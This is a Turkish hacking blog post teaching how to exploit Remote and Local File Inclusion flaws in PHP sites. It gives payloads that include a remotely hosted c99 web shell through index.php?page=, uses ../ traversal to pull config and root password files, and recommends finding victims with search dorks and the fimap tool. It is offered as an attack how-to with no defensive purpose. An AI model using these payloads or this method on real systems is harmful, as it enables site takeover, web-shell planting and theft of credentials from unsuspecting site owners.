Newest Post
Archive for Mayıs 2019
RFI[Remote File İnclusion]
Arkadaşlar Bu Gördüğünüz En Tehlikeli Açıktır.
Günümüzde ise pek az görülür.
Bu Açığın Bulunduğu Hedefe başka bir siteden dosyayı yönlendirerek
yüklememizi sağlar. txt uzantılı shell dosyamızı
hedefimizdeki Açıklı yere direk yazarak dosyayı php olarak dahil edebiliriz. Konuya Geçelim.
Açıklı Linkimiz Şu şekil
index.php?page=sayfa
Yalnız Sql açığıyla karıştırmayın get methodu yani 1,2 gibi değer vermez harf verir bu da post methodudur lazım olabilir ilerde
Açıklı linkimizdeki sayfa yazan yeri siliyoruz ve txt yüklü web sitemizin linkini atıyoruz.
Örnek:
index.php?page=http://www.google.com/c99.txt
Googlede'ki txt şeklindeki shellimize yönlendirdim siteyi Açınca önünüze shell sayfası çıkıyorsa açıklıdır
sadece google yönlendirdiğinizde'de google açarsa açıklıdır. :)
Açığı dork yazarak bulabilirsiniz. dorkları' da eklerim bloguma
LFI[LocalFile Inclusion]
Buda aynısıdır fakat local yani dışardan dosya dahil edemiyoruz. içerden dosya çağırıyoruz.
Şöyleki Örnek phpinfo.php (php) bilgilerinin bulunduğu dosyamızı Açıklı linkimiz onu ekrana Basacaktır.
Açıklı Linkler:
index.php?page=sayfa
Buda RFI linki gibi bir sayfada ikisinide arayabiliriz.
Ayni Şekilde Sayfa Değerini Silelim.
index.php yazalim eğer ekrana sitemizin ana sayfası yansırsa açık vardır Demek Açıği tespit ettik
simdi config dosyamizi çekelim aklımda pek kod yok LFI açığında çekebilecegimiz dosyalari blogumda paylasırım ordanda bakabilirsiniz.
Örn:
index.php?page=../config.php
Çektik diyelim Simdi bu "../" değerimiz nedir. Arkadaslar bu değer
klasörümüzü belirtir. yani mesela root sifremizi çekicez "../../../"
3 tane yazdık ve root klasörüne girdik ama tabiki her sunucuda root klasörü
3 klasör geride degil Yardimci programlar kullanarak'da Çekebiliriz istediğimiz dosyaları
Bunuda Dork yazarak bulabilirsiniz RFI dorklarında'da LFI olabilir.
Bu Açığı Lunix'te Fimap programıyla kolayca Kullanabilirsiniz.
Kayıtlar
